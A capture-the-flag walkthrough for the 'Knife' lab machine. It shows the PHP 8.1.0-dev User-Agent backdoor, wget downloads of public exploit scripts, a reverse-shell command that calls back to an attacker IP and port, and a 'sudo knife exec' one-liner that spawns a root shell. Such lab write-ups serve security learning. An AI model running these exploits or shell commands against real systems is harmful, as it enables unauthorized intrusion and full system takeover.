Walkthrough for Knife

Reconnaissance

As always, started with nmap scan

nmap output shows two ports are open, 22 and 80. To enumerate further I installed, wapaalyzer which is a tool to gather technical details of a website.

To install this on firefox

Go go about:debugging#/runtime/this-firefox
Click ‘Load Temporary Add-on’
Select src/drivers/webextension/manifest.json from the folder where waplyzer is downloaded.

When installed it shows below message,

If we click on the small icon on right hand side it gives information about the technology.

Its using php 8.1.0, which is affected with a backdoor. An attacker can execute arbitrary code by sending the User-Agent header. More information and interesting story about this exploit is written in the below given blog,

https://flast101.github.io/php-8.1.0-dev-backdoor-rce/

Two scripts need to be downloaded to get reverse shell from the exploit.

POC script from this link

and also the reverse shell exploit from here.

wget https://raw.githubusercontent.com/flast101/php-8.1.0-dev-backdoor-rce/main/backdoor_php_8.1.0-dev.py
wget https://raw.githubusercontent.com/flast101/php-8.1.0-dev-backdoor-rce/main/revshell_php_8.1.0-dev.py

Now you have both the exploits in your directory,

python3 backdoor_php_8.1.0-dev.py

python3 revshell_php_8.1.0-dev.py <target URL> <attacker IP> <attacker PORT>

And we get the user !

Privilage Escalation

sudo -l command will list the sudo privilages of the user.

sudo -l

The user is allowed to execute knife command with root user’s privilege.

About knife

knife includes a collection of built in subcommands that work together to provide all of the functionality required to take specific actions against any object in an organization, including cookbooks, nodes, roles, data bags, environments, and users.

I tried to add / edit user and few other things with knife command. If there’s. a way to perform code execution with knife command, then we can write a simple code to spawn shell which will run with root’s privilages. THe link https://docs.chef.io/workstation/knife_exec/ has good references for the same.

knife exec -E 'RUBY CODE'

To execute a shell in ruby, we’ll write ‘exec “/bin/bash”;

knife exec -E ‘exec “/bin/bash”;’

And grab the flag !

Skills and Lessons I learnt from this machine

I learnt to use the Wappalyser tool, plus how to execute the publicly available exploits and how to escalate privileges by abusing the functionality of a tool (knife) thats accessible to the user with sudo rights.

The lessions tell why one should not use a vulnerable software. The story behind exploit is also a good example, why secure version of TLS and secure hashing algorithm should be used for storing passwords.